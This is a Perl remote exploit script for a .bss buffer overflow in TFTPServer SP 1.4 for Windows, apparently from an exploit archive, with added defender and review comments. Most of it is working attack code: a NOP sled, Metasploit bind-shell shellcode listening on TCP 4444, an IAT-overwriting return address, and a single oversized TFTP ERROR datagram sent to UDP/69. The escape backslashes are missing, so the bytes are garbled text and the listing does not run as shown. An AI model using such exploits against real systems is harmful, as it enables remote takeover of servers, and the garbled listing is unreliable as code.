# Title : TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit
# Published : 2008-05-08
# Author : tixxDZ
#!/usr/bin/perl
# TFTPServer SP v1.4 for Windows remote .bss overflow exploit
# The Service or the RunStandAlone version.
# URL: http://sourceforge.net/projects/tftp-server/
#
# Author: tix or tixxDZ <tixxdz@gmail.com>
# Date: 07/05/2008
#
# Tested on Windows XP SP2 French not patched
#
# TFTPServer SP v1.4 is vulnerable to a very long TFTP Error Packet
# Other versions may also be vulnerable.
#
# TFTPServer respects RFC 1350 for error packets; many other
# TFTP servers don't.
# TFTP Error Packet: "\x00\x05" . ErrorMsg . "\x00"
#
# BUFFER is at 0041B3AB in the .bss section.
# This exploit overwrites the whole .bss section and part of the .idata section,
# patching function addresses in the IAT.
#
# For the TFTPServer Service we will patch the time() function
# For the TFTPServer StandAlone program we will patch the printf() function
#
# BUFFER = NOPS + SHELLCODE + RET
# we will put and execute our shellcode in the .idata section, .idata => RWE.
use strict;
# NOTE(review): no `use warnings` here; a reviewer would add it.
use IO::Socket::INET;
# Arguments: <target> [<type>].  The type selects which padding length is
# used below: anything containing "p" means the stand-alone build, anything
# else the service build.
# NOTE(review): this listing has lost the backslashes of its escape
# sequences -- the trailing "n" on each usage line was "\n", "t" was "\t" --
# so the script does not run as printed.
my $target = shift ||
die "Usage: $0 <target> <type>n <type> : type of the programn".
"t<s> for a TFTP servicent<p> for a TFTP simple programn";
# Second argument is optional; with none given the service layout is used.
my $type = defined $ARGV[0] ? shift : 's';
# Payload taken from the Metasploit generator (per the comment it carries):
# windows/shell_bind_tcp, 500 bytes, listening on TCP port 4444 once it
# runs.  The 500-byte length is what the padding arithmetic below relies on.
# NOTE(review): as printed, every "xNN" lacks its backslash, so these are
# plain three-character text fragments, not bytes; the string length and
# therefore the offsets below no longer line up.
# Defender note: a host that starts listening on TCP/4444 right after
# receiving an oversized TFTP datagram is the observable outcome here.
my $shellcode =
# windows/shell_bind_tcp - 500 bytes
# http://www.metasploit.com
# EXITFUNC=seh, LPORT=4444
"x3dx71x41xbfx75x04x66x32xfcx2fx84xd4x15x24" .
"x0axfdx92xb5x48x76x4bx19xe3x73x0cx77x4fx0d" .
"x4ax43x4ex7cx75x1dx7dx28xd6x96x79x14x91x7b" .
"x1cxb2x72x34xa9x9fxb1x73x49x70x25x98x7fx13" .
"xf5x88xe1x3fx74x2cxbax7ex20xc1xd1xe2x12xe0" .
"x11xd6x6bxd0xe3x40xbfx9fx4ax2fxb9xa8x3dxd2" .
"xebx0cx7ax2bxf9x4bx49x71x05x76x37xb4xb3x86" .
"xd5x41x97x66xbax91x46xb5x47x48x9bx35xa9x43" .
"x4fxbexb7x93xfcx2cx25x90x3cx99x92x77x02xfd" .
"xb8x42x98x15x14xb6x3fxd4x27xf8x2dxf5x24x1c" .
"x67xbbx1dx4exb0xb2x0dxb1x34x04x96xbbxa0x0c" .
"xb8xdexebx0cx5ex56x31x1exadx01xc3x85xc0x75" .
"xf7xc3xfcxe8xeexffxffxffx5cx66x53x93x74x8e" .
"x5cxd3x7bx11x28x40xa7xf6xa5xdcx9bx7dxc5xdb" .
"x9bx80xd9x6fx14x9bxaex2fx8ax9ax5bx86x41xa8" .
"x10x18xbbxe0xe6x82xefx87x27xc0xe8x46x6dx24" .
"xf7x8ax99xc3xccx5ex7ax04x47xbax09x0bx83x45" .
"xe5xd2x40x49xb2x91x09x4ex45x4dxb6x42xcex18" .
"xd4xbexccx7bxe7x8ex37x1fx6cxb3xf7x6bx32x38" .
"x73x1bxaexedx08x9cxc6xb3x66x93x98x45x9bxfb" .
"xdbx8cx05xafx45x59xf9x7dxe1xeex8exb3xaex44" .
"x8ex64x38xaex9dx79x83x60xa1x54xacx09xb8x3f" .
"xd3xe7x4bxc2x86x9dx49x3dxf8x0ax97xc8x0dx67" .
"x70x34x3bx2bx2cx99x90x9fx91x4ex55x73xe9xa1" .
"x3fx1bx04x1exd9x88xafx7fxb0x47x14x65xcax50" .
"x03x65xfcx35xbcxc8x55x35x6cx82xf1x64xa3xba" .
"xaex89x6ax6fx05x89x43xf8x40x3cxe2xb0xddx40" .
"x3cx12xb5xeax94x6cxe5x80x7fx74x7cx61x06x2d" .
"x81xbbxacx2exadx22x25xb5x2bxc3xdax58x3axf6" .
"x77xf3x65xd0x4bx7ax72x48x10xf4x9exbcx58xf5" .
"xf4x41x1axd7xf6xfcxb7xb4x8bx7bxf0x11x38xd0" .
"x68x14xc0x94x7fx27x49x9fx80x01xeax48x2dxff" .
"x5dx26xbbxfex0cx99x6ex50x51xc9xf9xffx74xef" .
"x37xacx79x26xadxacx7axf0xcdx83x0fxa8xcdxa7" .
"xcbx33xd1x7ex81x44xfdx17xd5x31xfaxb8x46xb9" .
"xd5xb8xb8x45xdax46x38x46xdax46";
# List assignment from one scalar: $RET receives the 4-byte little-endian
# address inside .idata, $buffer is left undef and is filled in below.
# (Escape backslashes are missing in this listing, as elsewhere.)
my ($RET,$buffer) = "x01x01x42x00"; # in the .idata section
# Any type argument containing "p" (case-insensitive) selects the
# stand-alone layout; everything else falls through to the service layout.
# Padding is sized so that NOPs + 500-byte payload + 4-byte RET reaches the
# IAT slot named in each comment: 19907 + 504 = 20411, 19955 + 504 = 20459.
if ($type =~ /p/i) {
# "x00x05" + 20411 bytes needed to patch the printf() function at 00420360
# ---------------------------------------------------------------------------
# 0040EB50 -FF25 60034200 JMP DWORD PTR DS:[<&msvcrt.printf>]
# ---------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer RunStandAlone programn";
$buffer = "x90" x 19907 . $shellcode . $RET;
}
else {
# "x00x05" + 20459 bytes needed to patch the time() function at 00420390
# ------------------------------------------------------------------------
# 0040EB60 -FF25 90034200 JMP DWORD PTR DS:[<&msvcrt.time>]
# ------------------------------------------------------------------------
print STDOUT "Exploiting TFTPServer Service programn";
$buffer = "x90" x 19955 . $shellcode . $RET;
}
# Single UDP datagram to the TFTP port; nothing is read back, so the
# script cannot tell whether the server accepted the packet.
my $sock = IO::Socket::INET->new( PeerAddr => $target,
PeerPort => 69,
Proto => 'udp')
or die "error: $!n";
# Opcode 5 (ERROR) followed by the ~20 KB "message" built above -- the
# trigger is simply an error string far longer than the fixed .bss buffer
# the server copies it into.  Defender note: a TFTP ERROR datagram of this
# size on UDP/69 (well above the 512-byte blocks TFTP normally moves) is a
# clear network signature; the server-side fix is to bound the message
# length before copying it into the fixed buffer.
$sock->send("x00x05" . $buffer, 0);
print STDOUT "done.n";
exit 0;